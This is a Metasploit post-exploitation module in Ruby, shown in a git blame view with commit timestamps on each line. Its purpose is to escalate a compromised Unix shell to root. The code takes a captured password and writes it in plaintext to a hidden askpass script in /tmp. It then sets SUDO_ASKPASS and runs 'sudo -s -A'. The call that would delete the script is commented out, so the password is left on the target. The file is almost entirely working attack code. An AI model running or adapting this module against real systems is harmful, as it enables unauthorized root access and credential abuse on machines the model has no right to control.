2011-11-15 23:38:45 +00:00
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# ## This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-11-15 23:38:45 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/common'
|
|
|
|
require 'msf/core/post/file'
|
2012-05-17 14:37:11 +00:00
|
|
|
require 'msf/core/post/unix'
|
2011-11-15 23:38:45 +00:00
|
|
|
require 'msf/core/post/linux/priv'
|
|
|
|
require 'msf/core/post/linux/system'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
|
|
|
|
|
|
|
include Msf::Post::Common
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Linux::Priv
|
|
|
|
include Msf::Post::Linux::System
|
|
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2011-11-18 16:17:43 +00:00
|
|
|
'Name' => 'Multiple Linux / Unix Post Sudo Upgrade Shell',
|
2011-11-15 23:38:45 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module attempts to upgrade a shell account to UID 0 by reusing the
|
2011-11-16 01:31:15 +00:00
|
|
|
given password and passing it to sudo. This technique relies on sudo
|
|
|
|
versions from 2008 and later which support -A.
|
2011-11-15 23:38:45 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'todb <todb[at]metasploit.com>'],
|
|
|
|
'Version' => '$Revision: $',
|
2011-11-18 16:17:43 +00:00
|
|
|
'Platform' => [ 'linux','unix','osx','solaris','aix' ],
|
2011-11-18 14:51:07 +00:00
|
|
|
'References' =>
|
2011-11-16 01:31:15 +00:00
|
|
|
[
|
|
|
|
# Askpass first added March 2, 2008, looks like
|
|
|
|
[ 'URL', 'http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h']
|
|
|
|
],
|
2011-11-15 23:38:45 +00:00
|
|
|
'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
# Run Method for when run command is issued
|
|
|
|
def run
|
|
|
|
print_status("SUDO: Attempting to upgrade to UID 0 via sudo")
|
|
|
|
sudo_bin = cmd_exec("which sudo")
|
|
|
|
if is_root?
|
|
|
|
print_status "Already root, so no need to upgrade permissions. Aborting."
|
|
|
|
return
|
|
|
|
end
|
|
|
|
if sudo_bin.empty?
|
|
|
|
print_error "No sudo binary available. Aborting."
|
|
|
|
return
|
|
|
|
end
|
2011-11-16 01:31:15 +00:00
|
|
|
get_root()
|
2011-11-15 23:38:45 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def get_root
|
|
|
|
password = session.exploit_datastore['PASSWORD']
|
|
|
|
if password.to_s.empty?
|
2011-11-17 19:19:13 +00:00
|
|
|
print_status "No password available, trying a passwordless sudo."
|
2011-11-15 23:38:45 +00:00
|
|
|
else
|
2011-11-17 19:19:13 +00:00
|
|
|
print_status "Sudoing with password `#{password}'."
|
2011-11-15 23:38:45 +00:00
|
|
|
end
|
2011-11-20 01:53:25 +00:00
|
|
|
askpass_sudo(password)
|
2011-11-15 23:38:45 +00:00
|
|
|
unless is_root?
|
|
|
|
print_error "SUDO: Didn't work out, still a mere user."
|
|
|
|
else
|
|
|
|
print_good "SUDO: Root shell secured."
|
|
|
|
report_note(
|
|
|
|
:host => session,
|
|
|
|
:type => "host.escalation",
|
|
|
|
:data => "User `#{session.exploit_datastore['USERNAME']}' sudo'ed to a root shell"
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# TODO: test on more platforms
|
|
|
|
def askpass_sudo(password)
|
|
|
|
if password.to_s.empty?
|
|
|
|
begin
|
|
|
|
::Timeout.timeout(30) do
|
|
|
|
cmd_exec("sudo -s")
|
|
|
|
end
|
2011-11-17 22:29:02 +00:00
|
|
|
rescue ::Timeout::Error
|
|
|
|
print_error "SUDO: Passwordless sudo timed out. Might be blocking."
|
2011-11-15 23:38:45 +00:00
|
|
|
rescue
|
2011-11-17 22:29:02 +00:00
|
|
|
print_error "SUDO: Passwordless sudo failed. Check the session log."
|
2011-11-15 23:38:45 +00:00
|
|
|
end
|
|
|
|
else
|
2011-11-17 19:19:13 +00:00
|
|
|
askpass_sh = "/tmp/." + Rex::Text.rand_text_alpha(7)
|
2011-11-15 23:38:45 +00:00
|
|
|
begin
|
2011-11-17 19:19:13 +00:00
|
|
|
# Telnet can be pretty pokey, allow about 20 seconds per cmd_exec
|
|
|
|
# Generally will be much snappier over ssh.
|
2011-11-17 22:29:02 +00:00
|
|
|
# Need to timeout in case there's a blocking prompt after all
|
2011-11-17 19:19:13 +00:00
|
|
|
::Timeout.timeout(120) do
|
|
|
|
vprint_status "Writing the SUDO_ASKPASS script: #{askpass_sh}"
|
2011-11-17 22:29:02 +00:00
|
|
|
cmd_exec("echo \\#\\!/bin/sh > #{askpass_sh}") # Cursed csh
|
2011-11-15 23:38:45 +00:00
|
|
|
cmd_exec("echo echo #{password} >> #{askpass_sh}")
|
2011-11-17 19:19:13 +00:00
|
|
|
vprint_status "Setting executable bit."
|
2011-11-15 23:38:45 +00:00
|
|
|
cmd_exec("chmod +x #{askpass_sh}")
|
|
|
|
vprint_status "Setting environment variable."
|
2011-11-17 19:19:13 +00:00
|
|
|
# Bruteforce the set command. At least one should work.
|
2011-11-18 14:51:07 +00:00
|
|
|
cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")
|
2011-11-16 22:48:19 +00:00
|
|
|
cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
|
2011-11-15 23:38:45 +00:00
|
|
|
vprint_status "Executing sudo -s -A"
|
|
|
|
cmd_exec("sudo -s -A")
|
|
|
|
end
|
2011-11-17 19:19:13 +00:00
|
|
|
rescue ::Timeout::Error
|
2011-11-17 22:29:02 +00:00
|
|
|
print_error "SUDO: Sudo with a password timed out."
|
2011-11-18 14:51:07 +00:00
|
|
|
rescue
|
2011-11-17 22:29:02 +00:00
|
|
|
print_error "SUDO: Sudo with a password failed. Check the session log."
|
2011-11-17 19:19:13 +00:00
|
|
|
end
|
2011-11-17 22:29:02 +00:00
|
|
|
# askpass_cleanup(askpass_sh)
|
2011-11-17 19:19:13 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def askpass_cleanup(askpass_sh)
|
|
|
|
begin
|
|
|
|
::Timeout.timeout(20) do
|
|
|
|
vprint_status "Deleting the SUDO_ASKPASS script."
|
|
|
|
cmd_exec("rm #{askpass_sh}")
|
2011-11-15 23:38:45 +00:00
|
|
|
end
|
2011-11-17 19:19:13 +00:00
|
|
|
rescue ::Timeout::Error
|
|
|
|
print_error "Timed out during sudo cleanup."
|
2011-11-15 23:38:45 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|